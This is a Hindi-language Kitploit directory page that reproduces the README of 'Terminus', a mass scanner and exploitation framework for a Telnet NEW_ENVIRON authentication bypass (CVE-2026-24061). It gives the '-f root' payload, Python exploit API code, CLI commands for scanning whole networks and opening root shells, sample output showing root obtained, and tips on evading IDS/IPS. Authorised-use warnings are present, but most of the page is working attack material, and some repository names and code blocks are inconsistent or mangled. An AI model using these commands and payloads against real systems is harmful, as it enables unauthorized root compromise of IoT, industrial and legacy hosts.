Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Terrminus-CVE-2026-2406 — AsyncIO स्कैनर और CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass) के लिए शोषण फ्रेमवर्क। इसमें उच्च-समवर्ती खोज, निष्क्रिय फिंगरप्रिंटिंग, और अधिकृत रूट शेल एस्केलेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/ridpath/terrminus-cve-2026-2406
विशेषाधिकार वृद्धिटोहीभेद्यता स्कैनरIoT सुरक्षाशोषणSCADA/ICS सुरक्षाजानकारी एकत्र करनावेब सुरक्षानेटवर्क सुरक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
पेनिट्रेशन टेस्टिंग
रेड टीमिंग
GitHubridpath/terrminus-cve-2026-2406

Terrminus-CVE-2026-2406

AsyncIO स्कैनर और CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass) के लिए शोषण फ्रेमवर्क। इसमें उच्च-समवर्ती खोज, निष्क्रिय फिंगरप्रिंटिंग, और अधिकृत रूट शेल एस्केलेशन शामिल है।

रिपॉजिटरी देखें
287 महीने पहलेअभी तक समीक्षित नहीं

Terminus - CVE-2026-24061 स्कैनर और शोषण ढांचा

CVE-2026-24061 Telnet NEW_ENVIRON प्रमाणीकरण बायपास और विशेषाधिकार वृद्धि भेद्यता के लिए एक सुरक्षा विश्लेषण इंजन।

Terminus


अवलोकन

Terminus एक व्यावसायिक सुरक्षा अनुसंधान उपकरण है जिसे CVE-2026-24061 के अधिकृत पेनेट्रेशन टेस्टिंग और भेद्यता मूल्यांकन के लिए डिज़ाइन किया गया है। यह गंभीर भेद्यता विरासती Telnet डेमन कार्यान्वयन को प्रभावित करती है, जिससे अप्रमाणित दूरस्थ हमलावर प्रमाणीकरण को बायपास कर रूट-स्तरीय पहुँच प्राप्त कर सकते हैं।

CVE-2026-24061 क्या है?

CVE-2026-24061 उन Telnet सेवाओं में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता है जो RFC 1572 (Telnet पर्यावरण विकल्प) का समर्थन करती हैं। यह भेद्यता NEW_ENVIRON सबनेगोशिएशन के दौरान USER पर्यावरण चर के अनुचित सैनिटाइज़ेशन का शोषण करती है:

  • सामान्य प्रमाणीकरण: USER=john → पासवर्ड के लिए संकेत देता है
  • शोषण पेलोड: USER=-f root → प्रमाणीकरण बायपास करता है, रूट शेल प्रदान करता है

प्रभाव:

  • पूर्ण प्रमाणीकरण बायपास (कोई पासवर्ड आवश्यक नहीं)
  • रूट तक तत्काल विशेषाधिकार वृद्धि
  • पूर्ण सिस्टम समझौता

प्रभावित सेवाएँ:

  • विरासती Telnet GNU Inetutils telnetd (विशेष रूप से 2.7 तक के संस्करण)
  • कमजोर Telnet कार्यान्वयन वाला IoT फर्मवेयर
  • पुरानी Telnet सेवाओं वाले औद्योगिक नियंत्रण सिस्टम

मुख्य विशेषताएँ

मास भेद्यता स्कैनर

  • उच्च-समवर्ती स्कैनिंग: AsyncIO का उपयोग करके 1,000+ लक्ष्यों को एक साथ स्कैन करें
  • CIDR समर्थन: पूरे नेटवर्क रेंज स्कैन करें (192.168.0.0/24, 10.0.0.0/8)
  • दोहरी पहचान मोड:
    • निष्क्रिय (डिफ़ॉल्ट): तेज़, सुरक्षित, सिग्नेचर-आधारित पहचान
    • सक्रिय सत्यापन (--verify): शोषण का प्रमाण, uid=0 रूट पहुँच की पुष्टि करता है
  • बैनर विश्लेषण: डेमन प्रकार और संस्करण फिंगरप्रिंट करें
  • जोखिम स्कोरिंग: बहु-स्तरीय विश्वास मूल्यांकन (CRITICAL, HIGH, MEDIUM, LOW)

RFC-अनुरूप प्रोटोकॉल इंजन

  • TerminusNegotiator क्लास: Telnet प्रोटोकॉल संचालन के लिए स्वच्छ API
    • Terminus.handshake() - RFC 854 अनुरूप हैंडशेक
    • Terminus.exploit() - CVE-2026-24061 पेलोड डिलीवरी
  • उचित विकल्प नेगोशिएशन: प्रोटोकॉल अनुपालन के माध्यम से IDS/IPS पहचान से बचता है
  • स्टेट मशीन: IAC अनुक्रमों का मजबूत हैंडलिंग (DO/DONT/WILL/WONT/SB/SE)

प्राधिकरण-गेटेड शोषण

  • इंटरैक्टिव शेल: रूट पहुँच के साथ पूर्ण पोस्ट-शोषण शेल
  • कमांड निष्पादन: एकल कमांड निष्पादित करें और आउटपुट कैप्चर करें
  • साक्ष्य संग्रह: uid, पर्यावरण चर, सिस्टम जानकारी एकत्र करें
  • सुरक्षा तंत्र:
    • स्पष्ट --exploit फ्लैग की आवश्यकता होती है
    • बैच स्कैनिंग मोड में अक्षम
    • सभी शोषण प्रयासों की ऑडिट लॉगिंग

बहु-प्रारूप रिपोर्टिंग

  • टर्मिनल: रंग-कोडित जोखिम स्तरों के साथ समृद्ध-स्वरूपित तालिकाएँ
  • JSON: SIEM/SOAR एकीकरण
  • CSV: स्प्रेडशीट ट्रैकिंग
  • HTML: आँकड़ों के साथ विस्तृत रिपोर्ट
  • Markdown: दस्तावेज़ीकरण-अनुकूल आउटपुट

आर्किटेक्चर

कोर इंजन: TerminusNegotiator

Terminus का हृदय TerminusNegotiator क्लास है, जो प्रोटोकॉल हैंडलिंग और शोषण तर्क के बीच एक स्वच्छ पृथक्करण प्रदान करता है:```python from terminus import TerminusNegotiator

Initialize engine

negotiator = TerminusNegotiator()

Step 1: RFC 854 compliant handshake

await negotiator.handshake(target="192.168.1.100", port=23)

Step 2: Deliver CVE-2026-24061 payload

result = await negotiator.exploit(payload="-f root")

if result.success: print(f"Root shell acquired: {result.evidence['uid']}")

root@kitploit:~
### इंजन बनाम स्क्रिप्ट दृष्टिकोण

**पारंपरिक स्क्रिप्ट** (मौजूदा उपकरण):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell

टर्मिनस इंजन:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report

root@kitploit:~
---

## स्थापना

### आवश्यकताएँ
- **Python 3.10+**
- **समर्थित प्लेटफ़ॉर्म:**
  - Windows 10/11 (PowerShell)
  - Windows + WSL2 (Kali Linux, Parrot OS, Ubuntu)
  - नेटिव Linux (Kali, Parrot, Ubuntu, Debian)
  - macOS (Python 3.10+ के साथ)

### त्वरित प्रारंभ (सभी प्लेटफ़ॉर्म)

#### Windows (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git

# Run setup script
.\setup_env.ps1

# Activate virtual environment
.venv\Scripts\Activate.ps1

# Verify installation
terminus --version

Linux / WSL2 / macOS (Bash)```bash

Clone repository

git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406

Run setup script

chmod +x setup_env.sh ./setup_env.sh

Activate virtual environment

source venv/bin/activate

Verify installation

terminus --version

root@kitploit:~
#### मैन्युअल इंस्टॉलेशन (सभी प्लेटफ़ॉर्म)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406

# Create virtual environment
python3 -m venv venv

# Activate (Linux/macOS/WSL)
source venv/bin/activate

# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1

# Install dependencies
pip install -e .

# Verify
terminus --version

निर्भरताएँ (क्रॉस-प्लेटफ़ॉर्म)

  • telnetlib3 - AsyncIO Telnet प्रोटोकॉल कार्यान्वयन
  • rich - टर्मिनल UI और फ़ॉर्मेटिंग (Windows/Linux पर ANSI समर्थन)
  • pydantic - डेटा सत्यापन और मॉडल
  • aiofiles - एसिंक फ़ाइल I/O
  • jinja2 - रिपोर्ट टेम्पलेटिंग
  • pyyaml - कॉन्फ़िगरेशन प्रबंधन
  • pathlib - क्रॉस-प्लेटफ़ॉर्म पथ हैंडलिंग (बिल्ट-इन)

नोट: सभी निर्भरताएँ शुद्ध Python हैं या उनमें क्रॉस-प्लेटफ़ॉर्म व्हील्स हैं। किसी प्लेटफ़ॉर्म-विशिष्ट संकलन की आवश्यकता नहीं है।


शेल कम्प्लीशन (वैकल्पिक)

तेज़ कमांड प्रविष्टि के लिए टैब कम्प्लीशन सक्षम करें:

Bash```bash

_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc

root@kitploit:~
### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc

मछली```bash

_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish

root@kitploit:~
### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression

इसे आज़माएं:```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.

root@kitploit:~
---

## उपयोग

### स्कैनिंग मोड

#### एकल लक्ष्य स्कैन```bash
terminus scan -t 192.168.1.100

CIDR रेंज स्कैन```bash

terminus scan -t 192.168.1.0/24

root@kitploit:~
#### फ़ाइल-आधारित बैच स्कैन```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500

उच्च-समवर्ती नेटवर्क स्कैन```bash

terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200

root@kitploit:~
### डिटेक्शन मोड

#### पैसिव डिटेक्शन (डिफ़ॉल्ट - सुरक्षित)```bash
terminus scan -t target.com --passive-only

आक्रामक पहचान (सभी ह्यूरिस्टिक्स)```bash

terminus scan -t target.com --aggressive

root@kitploit:~
#### सक्रिय सत्यापन मोड (Proof-of-Exploit)```bash
terminus scan -t 192.168.1.100 --verify

उपयोग

लाइव प्रदर्शन

संस्करण जांचें:```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db

root@kitploit:~
**निष्क्रिय स्कैन (डिफ़ॉल्ट - रूढ़िवादी जोखिम मूल्यांकन):**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Parsing 1 targets...
Found 1 valid targets

  Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 0 0:00:00

╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061      │
│ Total Targets: 1         │
│ Scanned: 1               │
│ Failed: 0                │
│ Timeouts: 0              │
│                          │
│ Vulnerability Breakdown: │
│   Critical: 0            │
│   High: 0                │
│   Medium: 0              │
│   Low: 1                 │
│   Info: 0                │
│                          │
│ Duration: 3.53s          │
│ Avg Scan Time: 3522.22ms │
│                          │
╰──────────────────────────╯

                                 Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target        │ Port │  Status   │ Risk │ Daemon  │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Low  │ unknown │ Unknown │     YES     │    -     │       3522.22 │
╰───────────────┴──────┴───────────┴──────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

No vulnerable targets found

--verify के साथ सक्रिय सत्यापन (प्रूफ-ऑफ-एक्सप्लॉइट):```powershell PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323 --verify

================================================================ TERMINUS CVE-2026-24061 Scanner & Exploitation Framework

Parsing 1 targets... Found 1 valid targets

Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 1 0:00:00

╭────── Scan Summary ──────╮ │ CVE: CVE-2026-24061 │ │ Total Targets: 1 │ │ Scanned: 1 │ │ Failed: 0 │ │ Timeouts: 0 │ │ │ │ Vulnerability Breakdown: │ │ Critical: 1 │ │ High: 0 │ │ Medium: 0 │ │ Low: 0 │ │ Info: 0 │ │ │ │ Duration: 8.04s │ │ Avg Scan Time: 8029.55ms │ │ │ ╰──────────────────────────╯

root@kitploit:~
                               Terminus - CVE-2026-24061 Scan Results

╭───────────────┬──────┬───────────┬──────────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮ │ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │ ├───────────────┼──────┼───────────┼──────────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤ │ 172.17.45.122 │ 2323 │ completed │ Critical │ unknown │ Unknown │ YES │ ROOT │ 8029.55 │ ╰───────────────┴──────┴───────────┴──────────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

Found 1 vulnerable targets!

root@kitploit:~
**इंटरैक्टिव शोषण:**```powershell
PS C:terminus> python -m terminus exploit -t 172.17.45.122 -p 2323 --yes

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Attempting exploitation of 172.17.45.122:2323...
Payload: -f root

CVE-2026-24061 exploitation attempt initiated with payload: -f root
CVE-2026-24061 exploitation SUCCESSFUL - root access obtained

[*] CVE-2026-24061 Interactive Shell Started
[*] Type 'exit' or press Ctrl+C to quit

whoami
root
┌──[root@parrot]─[~]
└──╼ #

मुख्य अवलोकन:

  • निष्क्रिय मोड: NEW_ENVIRON समर्थन का पता चला लेकिन LOW जोखिम की रिपोर्ट की (रूढ़िवादी)
  • सक्रिय सत्यापन: रूट एक्सेस (uid=0) की पुष्टि हुई, "ROOT" सत्यापन स्थिति के साथ CRITICAL जोखिम तक बढ़ाया गया
  • शोषण: पासवर्ड प्रॉम्प्ट के बिना तत्काल रूट शेल

यह क्या करता है:

  • पहले निष्क्रिय पहचान करता है (बैनर + प्रोटोकॉल विश्लेषण)
  • यदि भेद्यता का संदेह हो, तो -f root पेलोड के साथ वास्तविक शोषण का प्रयास करता है
  • प्रतिक्रिया में uid=0 की जाँच करके रूट एक्सेस की पुष्टि करता है
  • रूट एक्सेस की पुष्टि होने पर जोखिम को CRITICAL तक बढ़ा देता है
  • स्कैन परिणामों में सत्यापन स्थिति आउटपुट करता है

उपयोग के मामले:

  • अनुपालन रिपोर्टों के लिए उच्च-विश्वास सत्यापन
  • प्रूफ-ऑफ-कॉन्सेप्ट प्रदर्शन
  • विक्रेताओं को रिपोर्ट करने से पहले शोषण क्षमता की पुष्टि करना
  • साक्ष्य संग्रह की आवश्यकता वाले रेड टीम ऑपरेशन

उदाहरण आउटपुट:``` Target Port Status Daemon Risk Verified 192.168.1.100 23 VULNERABLE inetutils-telnetd CRITICAL ROOT ACCESS 192.168.1.101 23 VULNERABLE netkit-telnetd HIGH Not tested 192.168.1.102 23 SAFE OpenBSD-telnetd LOW N/A

root@kitploit:~
**बैच सत्यापन:**```bash
terminus scan -f targets.txt --verify -o json -w verified_results.json

नोट: सक्रिय सत्यापन शोषण का प्रयास करता है। केवल उचित प्राधिकरण के साथ उपयोग करें।

आउटपुट प्रारूप

JSON आउटपुट```bash

terminus scan -t 192.168.1.0/24 -o json > results.json

root@kitploit:~
#### HTML रिपोर्ट```bash
terminus scan -f targets.txt -o html -w report.html

CSV निर्यात```bash

terminus scan -t 10.0.0.0/24 -o csv > vulnerabilities.csv

root@kitploit:~
### एक्सप्लॉइटेशन (केवल अधिकृत उपयोग के लिए)

#### इंटरैक्टिव शेल```bash
terminus exploit -t 192.168.1.100
# Requires confirmation prompt
# Grants root shell on vulnerable target

कमांड निष्पादन```bash

terminus exploit -t 192.168.1.100 -c "id"

Output: uid=0(root) gid=0(root) groups=0(root)

root@kitploit:~
#### कस्टम पेलोड```bash
terminus exploit -t 192.168.1.100 --payload "-f admin"

उपयोगिता कमांड

भेद्यता सिग्नेचर अपडेट करें```bash

terminus update-signatures

root@kitploit:~
#### पिछले परिणाम सत्यापित करें```bash
terminus verify -f results.json

संस्करण और हस्ताक्षर दिखाएँ```bash

terminus version

root@kitploit:~
---

## परीक्षण वातावरण सेटअप

### रेड टीम के लिए: क्रॉस-प्लेटफ़ॉर्म डिप्लॉयमेंट

**Terminus को पोर्टेबल डिप्लॉयमेंट के लिए डिज़ाइन किया गया है** - निर्देशिका को किसी भी Windows/Linux सिस्टम पर कॉपी करें और बिना इंस्टॉलेशन के चलाएं:```bash
# Copy terminus directory to target system
# No hardcoded paths - everything is relative

# Run directly (no installation needed)
cd terminus
python3 -m terminus scan -t 192.168.1.0/24

# All output stays in project directory:
# - Logs: ./logs/terminus.log
# - Reports: ./reports/
# - Config: ./config.yaml

WSL2 परीक्षण वातावरण (Windows)

Windows Red Team वर्कस्टेशन के लिए अनुशंसित - कमजोर परीक्षण सेवाओं को तैनात करने के लिए पृथक Linux वातावरण:

Kali या Parrot के साथ WSL2 इंस्टॉल करें```powershell

Windows PowerShell (Admin)

Install WSL2

wsl --install

Install Kali Linux

wsl --install -d kali-linux

OR Install Parrot OS (if available)

wsl --install -d ParrotOS

Verify

wsl -l -v

root@kitploit:~
#### WSL2 के अंदर (Kali/Parrot)```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install Terminus dependencies
sudo apt install python3 python3-pip python3-venv

# Install testing tools
sudo apt install netkit-telnetd telnetd wireshark tcpdump

# Clone and setup Terminus
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406
cd Terminusb-CVE-2026-2406
./setup_env.sh
source venv/bin/activate

असुरक्षित टेस्ट सेवा तैनात करें (केवल WSL2)

चेतावनी: केवल पृथक लैब वातावरण में। उत्पादन प्रणालियों पर कभी नहीं।```bash

Inside WSL2

Install vulnerable netkit-telnetd version

sudo apt install netkit-telnetd=0.17-*

Configure for NEW_ENVIRON support

Edit /etc/inetd.conf to enable telnet

Start service

sudo systemctl restart inetd

Test from Windows host

From PowerShell:

terminus scan -t $(wsl hostname -I)

root@kitploit:~
### क्रॉस-प्लेटफ़ॉर्म परीक्षण मैट्रिक्स

अपनी रेड टीम द्वारा उपयोग किए जाने वाले सभी प्लेटफ़ॉर्म पर Terminus का परीक्षण करें:

| प्लेटफ़ॉर्म | इंस्टॉलेशन | स्कैनिंग | एक्सप्लॉइटेशन |
|----------|-------------|----------|--------------|
| Windows 10/11 (PowerShell) | हाँ | हाँ | हाँ |
| WSL2 - Kali Linux | हाँ | हाँ | हाँ |
| WSL2 - Parrot OS | हाँ | हाँ | हाँ |
| WSL2 - Ubuntu | हाँ | हाँ | हाँ |
| Native Kali Linux | हाँ | हाँ | हाँ |
| Native Parrot OS | हाँ | हाँ | हाँ |
| macOS | हाँ | हाँ | हाँ |

---

## API संदर्भ

### Python एकीकरण```python
import asyncio
from terminus import TerminusScanner, TerminusExploiter, TerminusNegotiator
from terminus.reporting.models import RiskScore

async def scan_network():
    # High-level scanner
    async with TerminusScanner() as scanner:
        async for result in scanner.scan_targets(["192.168.1.0/24"]):
            if result.risk_score == RiskScore.CRITICAL:
                print(f"CRITICAL: {result.target}")
                print(f"   Daemon: {result.daemon_type} {result.version}")
                print(f"   Confidence: {result.vulnerability_confidence:.2%}")

async def exploit_target():
    # Direct engine usage
    negotiator = TerminusNegotiator()
    
    # Handshake
    success = await negotiator.handshake(target="192.168.1.100", port=23)
    if not success:
        print("Handshake failed")
        return
    
    # Exploit
    result = await negotiator.exploit(payload="-f root")
    if result.success:
        print(f"Root access obtained")
        print(f"Evidence: {result.evidence}")

# Run
asyncio.run(scan_network())

सुरक्षा और नैतिकता

कानूनी चेतावनी

यह टूल केवल निम्नलिखित के लिए है:

  • अधिकृत पैठ परीक्षण (penetration testing) कार्य
  • नियंत्रित वातावरण में सुरक्षा अनुसंधान
  • CTF प्रतियोगिताएं और शैक्षिक प्रयोगशालाएं
  • लिखित अनुमति के साथ रक्षात्मक सुरक्षा मूल्यांकन

अनधिकृत उपयोग अवैध और अनैतिक है।

सुरक्षा तंत्र

  1. प्राधिकरण आवश्यक: शोषण (exploitation) के लिए स्पष्ट --exploit फ्लैग आवश्यक है
  2. पुष्टिकरण संकेत: शोषण से पहले इंटरैक्टिव पुष्टिकरण
  3. ऑडिट लॉगिंग: सभी शोषण प्रयास टाइमस्टैम्प के साथ लॉग किए जाते हैं
  4. एकल-लक्ष्य प्रवर्तन: बैच स्कैन मोड में शोषण अक्षम
  5. दर सीमा (Rate Limiting): स्कैनिंग के दौरान आकस्मिक DoS को रोकता है

जिम्मेदार प्रकटीकरण

यदि आप Terminus का उपयोग करके कमजोर सिस्टम खोजते हैं:

  1. बिना लिखित प्राधिकरण के सिस्टम का शोषण न करें
  2. जिम्मेदार प्रकटीकरण के माध्यम से सिस्टम मालिकों को निष्कर्ष रिपोर्ट करें
  3. Terminus रिपोर्टिंग सुविधाओं का उपयोग करके निष्कर्षों का दस्तावेजीकरण करें
  4. समन्वित भेद्यता प्रकटीकरण दिशानिर्देशों का पालन करें

संदर्भ

CVE जानकारी

  • CVE ID: CVE-2026-24061
  • गंभीरता: CRITICAL (CVSS 9.8)
  • वेक्टर: नेटवर्क, बिना प्रमाणीकरण, निम्न जटिलता

अनुसंधान और कार्यान्वयन

  • प्राथमिक अनुसंधान: SafeBreach-Labs CVE-2026-24061
  • संदर्भ शोषण: telnet_rce.py
  • बैच स्कैनर: TryA9ain CVE-2026-24061

प्रोटोकॉल मानक

  • RFC 854: Telnet प्रोटोकॉल विनिर्देश
  • RFC 1572: Telnet पर्यावरण विकल्प

परीक्षण और सत्यापन

परीक्षण कवरेज

  • pytest के साथ 90%+ कोड कवरेज
  • सभी मुख्य मॉड्यूल के लिए यूनिट परीक्षण
  • मॉक Telnet सर्वर के साथ एकीकरण परीक्षण
  • प्रदर्शन बेंचमार्क (1,000 लक्ष्य < 60 सेकंड)

मैनुअल परीक्षण चेकलिस्ट

  • कमजोर सेवा स्कैन करें (पहचान सत्यापित करें)
  • पैच की गई सेवा स्कैन करें (कोई गलत सकारात्मक नहीं सत्यापित करें)
  • प्रमाणीकरण बाईपास परीक्षण करें (कोई पासवर्ड प्रॉम्प्ट नहीं)
  • विशेषाधिकार वृद्धि सत्यापित करें (uid=0)
  • IDS अलर्ट की निगरानी करें (गोपनीयता सत्यापित करें)
  • प्रदर्शन परीक्षण (1,000+ लक्ष्य)

कॉन्फ़िगरेशन

config.yaml (क्रॉस-प्लेटफ़ॉर्म)

सभी पथ प्रोजेक्ट रूट के सापेक्ष हैं - बिना संशोधन के Windows, Linux और WSL पर काम करते हैं:```yaml

config.yaml - Cross-platform configuration

All paths relative to project directory

scanner: default_port: 23 connect_timeout: 3.0 handshake_timeout: 5.0 max_concurrent: 1000 rate_limit: 100 # connections/second

detection: passive_only: true # Safe mode by default banner_timeout: 2.0 heuristic_checks: true

Signature database (relative path)

signatures_db: "./signatures.db"

exploit: require_authorization: true default_payload: "-f root" evidence_collection: true interactive_shell: true

reporting: default_format: "terminal" include_safe_targets: false verbosity: "normal"

Output directory (relative path - works on Windows/Linux)

output_dir: "./reports"

logging: level: "INFO"

Log file (relative path - automatic directory creation)

file: "./logs/terminus.log" format: "json" console_enabled: true


Acknowledgments

  • SafeBreach Labs: Original CVE-2026-24061 research and exploit implementation
  • TryA9ain: Batch scanning approach inspiration
  • RFC Authors: Telnet protocol specifications

टूल डाउनलोड करें